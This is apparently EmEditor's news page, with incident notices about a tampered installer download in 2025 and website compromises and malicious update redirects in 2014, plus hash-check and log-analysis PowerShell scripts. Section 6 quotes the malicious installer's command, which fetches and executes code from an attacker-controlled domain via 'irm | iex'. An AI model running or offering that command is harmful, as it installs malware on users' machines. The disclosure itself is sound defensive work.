Posts

[Important] Security Incident Notice Regarding the EmEditor Installer Download Link

We regret to inform you that we have identified an incident involving the EmEditor official website’s download path (the [Download Now] button), where unauthorized modification by a third party is suspected. During the affected period, the installer downloaded via that button may not have been the legitimate file provided by us (Emurasoft, Inc.).

We sincerely apologize for the concern and inconvenience this may cause. Please review the information below.


1. Potentially Affected Period

  • Dec 19, 2025 18:39 – Dec 22, 2025 12:50 (U.S. Pacific Time)

If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe.


2. Incident Summary (High-Level Cause)

The [Download Now] button normally points to the following URL:

  • https://support.emeditor.com/en/downloads/latest/installer/64

This URL uses a redirect. However, during the affected period, the redirect settings appear to have been altered by a third party, resulting in downloads being served from the following (incorrect) URL:

  • https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi

This file was not created by Emurasoft, Inc., and it has already been removed.

As a result, we have confirmed that the downloaded file may be digitally signed not by us, but by another organization named WALSHAM INVESTMENTS LIMITED.

Note: This issue may not be limited to the English page and may affect similar URLs for other languages as well (including Japanese).


3. File Confirmed as Potentially Affected

At this time, the only file confirmed to be involved is:

  • emed64_25.4.3.msi

Legitimate file (official)

  • File name: emed64_25.4.3.msi
  • Size: 80,376,832 bytes
  • Digital signature: Emurasoft, Inc.
  • SHA-256: e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e

Suspicious file (possible tampering)

  • File name: emed64_25.4.3.msi
  • Size: 80,380,416 bytes
  • Digital signature: WALSHAM INVESTMENTS LIMITED

4. Not Affected

You are not affected if any of the following applies:

  • You updated via EmEditor’s Update Checker or through EmEditor’s automatic update
  • You downloaded directly from download.emeditor.info
    Example: https://download.emeditor.info/emed64_25.4.3.msi
  • You downloaded a file other than emed64_25.4.3.msi
  • You used the portable version
  • You used the store app version
  • You installed/updated using winget
  • You downloaded the file but did not run/execute it

5. How to Check and What to Do

If you may have downloaded the installer via [Download Now] during the affected period, please verify the digital signature and SHA-256 hash of the file emed64_25.4.3.msi.

5-1. How to check the Digital Signature (Windows)

  1. Right-click the file (emed64_25.4.3.msi) and select Properties.
  2. Open the Digital Signatures tab.
  3. Confirm that the signer is Emurasoft, Inc.
  • If it shows WALSHAM INVESTMENTS LIMITED, the file may be malicious.

If the “Digital Signatures” tab is not shown, the file may be unsigned or the signature may not be recognized. In that case, do not run the file; delete it and follow the guidance below.

5-2. How to check SHA-256 (Windows / PowerShell)

Open PowerShell and run:

Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256

Confirm the output SHA-256 matches:

  • Legitimate SHA-256:
    e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e
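
The checks in 5-1 and 5-2 can also be run in one pass from PowerShell. The script below is an added example, not a tool provided by Emurasoft, Inc.; the function name Test-EmEditorInstaller is hypothetical, the expected values are the ones listed in section 3, and it assumes the certificate's simple name is the signer name shown on the Digital Signatures tab.

```powershell
# Added example: compare a downloaded installer with the values published in section 3.
# Test-EmEditorInstaller is a hypothetical helper name, not an Emurasoft tool.
function Test-EmEditorInstaller {
    param(
        [Parameter(Mandatory)]
        [string]$Path
    )

    # Values published in this notice for the legitimate emed64_25.4.3.msi
    $expectedSha256 = 'e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e'
    $expectedSize   = 80376832
    $expectedSigner = 'Emurasoft, Inc.'
    $knownBadSigner = 'WALSHAM INVESTMENTS LIMITED'

    $file = Get-Item -LiteralPath $Path -ErrorAction Stop
    $hash = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
    $sig  = Get-AuthenticodeSignature -LiteralPath $file.FullName

    # An unsigned file has no SignerCertificate; that is a failed check, not a script error.
    $signer = $null
    if ($sig.SignerCertificate) {
        # Assumption: the simple name (normally the subject CN) is the name the dialog shows.
        $signer = $sig.SignerCertificate.GetNameInfo(
            [System.Security.Cryptography.X509Certificates.X509NameType]::SimpleName, $false)
    }

    $hashOk = $hash -ieq $expectedSha256
    # Status is 'Valid' only when the signature verifies and the chain is trusted on this machine.
    $signerOk = ($sig.Status -eq 'Valid') -and ($signer -eq $expectedSigner)

    [pscustomobject]@{
        Path            = $file.FullName
        SizeMatches     = $file.Length -eq $expectedSize
        Sha256          = $hash.ToLower()
        Sha256Matches   = $hashOk
        SignatureStatus = $sig.Status
        Signer          = $signer
        SignerMatches   = $signerOk
        KnownBadSigner  = $signer -eq $knownBadSigner
        # Only a file that passes both the hash and the signature check is treated as official.
        Verdict         = if ($hashOk -and $signerOk) { 'Matches official file' } else { 'DO NOT RUN' }
    }
}

Test-EmEditorInstaller -Path .\emed64_25.4.3.msi
```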

If the signature or SHA-256 does not match (Recommended actions)

If the digital signature is not Emurasoft, Inc. (e.g., it is WALSHAM INVESTMENTS LIMITED) or the SHA-256 does not match, you may have obtained a tampered file (potentially containing malware).

  • Immediately disconnect the affected computer from the network (wired/wireless)
  • Run a full malware scan on the system
  • Depending on the situation, consider refreshing/rebuilding the environment including the OS
  • Consider the possibility of credential exposure and change passwords used/stored on that device (and enable MFA where possible)

If you are using EmEditor in an organization, we also recommend contacting your internal security team (e.g., CSIRT) and preserving relevant logs where possible.


6. Observed Behavior (As Currently Confirmed)

The suspicious installer may attempt to run the following command when executed. Do not run this command under any circumstances.

  • powershell.exe "irm emeditorjp.com | iex"

This command downloads and executes content from emeditorjp.com.
emeditorjp.com is not a domain managed by Emurasoft, Inc.

Please also note that the installer may still proceed to install EmEditor normally and install legitimate EmEditor program files, which could make the issue difficult to notice.


7. Current Status and Next Updates

We are continuing to investigate the facts and determine the full scope of impact. We will provide updates on this page and/or through our official channels as soon as more information becomes available.
We take this incident very seriously and will implement necessary measures to identify the cause and prevent recurrence.

We sincerely apologize again for the inconvenience and concern this may have caused, and we appreciate your understanding and continued support of EmEditor.

Interview article with an Internet Watch editor was published today!

Internet Watch (Japanese): Commitment to “edit text”! Why is the de facto standard editor “EmEditor” different from other editors?

Interview article with a MyNavi News editor was published today!

MyNavi News: Approaching the true value of EmEditor, a text editor that continues to be comfortable and fast – Interview with Yutaka Emura, President of Emurasoft, Inc. (Japanese)

The 64-bit portable version released. File hosting switched to the Amazon S3 cloud

Today, we released EmEditor v14.8.0, and alongside the installer and the 32-bit portable version we also released a 64-bit portable version. Installers in all formats are available at the Download page.

Moreover, the file hosting was switched from the old web hosting server to the Amazon S3 cloud service. We hope this change will bring us faster and more stable downloads and updates.

We will continue improving our services. Please contact us if there are any issues with downloading or updating.

Thank you for using EmEditor!

Version 14.6 feature page was added

Today, we added the EmEditor Version 14.6 feature page. This new version adds important features with big data and database files in mind: more CSV support, Filter Bar, more Search options including the Extract button. We are planning to release EmEditor Version 14.6 very soon.

Thank you for using EmEditor!

Investigation report about the hacking incident

Yesterday, we received the final investigation report from JPCERT/Coordination Center.

How the unauthorized hacking happened

From the various remaining access logs, we could not identify the cause of the unauthorized hacking. We confirmed suspicious accesses (web and ftp) from 203.194.144.#, and we confirmed traces of attack attempts in early August. However, we couldn’t identify how the hacker entered our site from these traces alone. There were no successful logins from these IP addresses.

About unauthorized redirects

From the remaining access logs, the following 2 accesses are considered to be unauthorized accesses redirected by the .htaccess file that was placed by a hacker.

#.#.#.# - - [18/Aug/2014:05:41:38 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"
#.#.#.# - - [18/Aug/2014:06:19:04 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"

These accesses match the IP addresses written in the .htaccess file and the time frame when the incident happened. In addition, the number of bytes recorded in the access log (884) differs from the number of bytes recorded for accesses in other time frames and from other IP addresses.

Access log entries normally look like this:

#.#.#.# - - [10/Aug/2014:03:45:09 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"

The number of bytes is 855 for this file, but the above two accesses show 884 bytes.

The clients who own the above IP addresses were contacted by JPCERT/CC, and no malware infections were found. The access logs record all accesses, including mere update checks without actual installation.
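
The size comparison described above can be automated by grouping requests by path and flagging 200 responses whose byte count differs from the most common size for that path. This is an added example, not tooling used by Emurasoft or JPCERT/CC; the function name Find-SizeAnomaly is hypothetical, and the sample lines are constructed from the entries quoted here, with documentation-range IP addresses in place of the masked #.#.#.# values.

```powershell
# Added example: flag 200 responses whose size differs from the usual size for the same path.
# Find-SizeAnomaly is a hypothetical name; the sample log lines below are constructed.
function Find-SizeAnomaly {
    param([string[]]$Lines)

    # Apache combined format: ip ident user [time] "METHOD path proto" status bytes ...
    $pattern = '^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "\S+ (?<path>\S+) [^"]*" (?<status>\d{3}) (?<bytes>\d+)'

    $hits = foreach ($line in $Lines) {
        if ($line -notmatch $pattern) { continue }      # skip lines that do not parse
        if ($Matches.status -ne '200') { continue }     # only compare successful responses
        [pscustomobject]@{
            Ip    = $Matches.ip
            Time  = $Matches.time
            Path  = $Matches.path
            Bytes = [int64]$Matches.bytes
        }
    }

    foreach ($group in ($hits | Group-Object Path)) {
        # Baseline = the size served most often for this path
        $top = $group.Group | Group-Object Bytes | Sort-Object Count -Descending |
            Select-Object -First 1
        $baseline = $top.Group[0].Bytes
        foreach ($h in $group.Group) {
            if ($h.Bytes -ne $baseline) {
                [pscustomobject]@{
                    Time = $h.Time; Ip = $h.Ip; Path = $h.Path
                    Bytes = $h.Bytes; Baseline = $baseline
                }
            }
        }
    }
}

# Constructed sample: four normal responses (855 bytes) and two redirected ones (884 bytes)
$sample = @(
    '192.0.2.10 - - [10/Aug/2014:03:45:09 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"'
    '192.0.2.11 - - [17/Aug/2014:21:02:40 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"'
    '198.51.100.7 - - [18/Aug/2014:05:41:38 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"'
    '192.0.2.12 - - [18/Aug/2014:05:50:13 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"'
    '198.51.100.8 - - [18/Aug/2014:06:19:04 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 884 "-" "AdvancedInstaller"'
    '192.0.2.13 - - [19/Aug/2014:08:15:27 -0500] "GET /pub/updates/emed64_updates_ja.txt HTTP/1.1" 200 855 "-" "AdvancedInstaller"'
)
Find-SizeAnomaly -Lines $sample | Format-Table -AutoSize
```

A legitimate update to the file also changes its size, so hits need to be compared against the release history before they are treated as tampering.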

Future measures

In addition to routine updates of WordPress plug-ins and themes, we periodically scan our site for malware, monitor files on the server and access logs, and block suspicious IP addresses. On August 29th, we protected the entire site of emeditor.com with SSL encrypted connections. We are also planning to move our forums to another site or an electronic mailing list for improved security.

The next version of Advanced Installer, which we used to make the Update Checker, will be able to block update installers that do not carry the same digital signature as ours. Future EmEditor versions will restore the Update Checker with improved security.

We apologize for any inconvenience that this situation might have caused you.

See also:

Possible malware attack by EmEditor Update Checker

Possible malware attack by EmEditor Update Checker

Dear EmEditor user,

We have found that malicious files were placed in a subfolder of the EmEditor website, and we estimate these files were placed by a hacker between 6:36 am and 11:20 am on August 18th, Pacific Daylight Time (USA and Canada), or between 1:36 pm and 6:20 pm on August 18th, UTC. If a user ran the EmEditor Update Checker from one of certain IP addresses, a malicious program, rather than EmEditor, might have been installed. The IP addresses are:

For the following list, * represents any number between 0 and 255. All 256 numbers between 0 and 255 are IP addresses in question.


For the following list, # represents a number between 0 and 255, but only one number represents the IP address in question. To protect users’ privacy, the actual IP address is hidden by #. If your IP address is included in this list, please contact us at [email protected] with your IP address, and we will let you know whether your IP address is included.


If your IP address is included in any of the above lists, and if you used the Update Checker of EmEditor during the above time frame, there is a possibility that your computer might have been infected by a virus. If so, please use anti-virus software to clean your computer.

To check your IP address, please go to www.google.com and enter “My IP”.

Currently, our server hosting company is scanning the whole website. As soon as the scan is completed, we plan to take every measure to resolve the issue completely.

We will keep you informed of our progress. If we cannot get access to our website, we might use Twitter, Google+, or Facebook to make announcements.

We apologize for any inconvenience that this situation might have caused you.

Website scans were completed and all websites are clean

Our website scans were completed, and all our websites were clean, including all of our foreign language EmEditor websites as well as Emurasoft Customer Center. This means this English website was not affected by this case.

Nevertheless, as a precaution, we recommend changing your password if you have an account in one of our sites, and please do not share the same password with Emurasoft Customer Center or any other websites.

To prevent future hacker attacks, we have tightened our security level. We no longer accept new members automatically. If you are not a member yet, and if you would like to join our forums, please contact us.

Once again, we apologize for any inconvenience.

Thank you for using EmEditor!

EmEditor foreign language websites attacked by hackers

Dear EmEditor user,

On August 12th, 2014, we discovered traces of malicious code in our Japanese EmEditor home page and Simplified Chinese EmEditor home page. Because of this, we temporarily stopped our websites, and we have been checking and cleaning up the sites. In the Japanese site, there were traces where usernames, passwords, and IP addresses of users might have been compromised.

If you have an account in the Japanese site, it is strongly recommended that you change your password. To change the password, please go to the Forums page and log into your account. After signing in, you will see a menu bar at the top of the webpage. Go to the top right corner of the webpage, which shows your username, and click “Edit My Profile” in the drop-down menu.

Currently, there is no evidence that other language sites, including this English site, were compromised, and there is no evidence that Emurasoft Customer Center was compromised. However, as a precaution, we strongly recommend changing your password if you have an account in these sites. If you share the same password with other websites, we also recommend changing your passwords on those sites.

We apologize for any inconvenience that this situation might have caused you. We are still scanning other language home pages. We will keep you updated if there is any progress. Thank you.

The forum conversion completed!

We have completed the conversion from old forums to new website!

You can see our new forums here. You will see all old messages are converted to the new website.

If you already had an account with the old forums, your account was converted to the new website. However, your password was set to a random string. Please go to the Lost Password and change your password before you log in to the new website.

Thank you!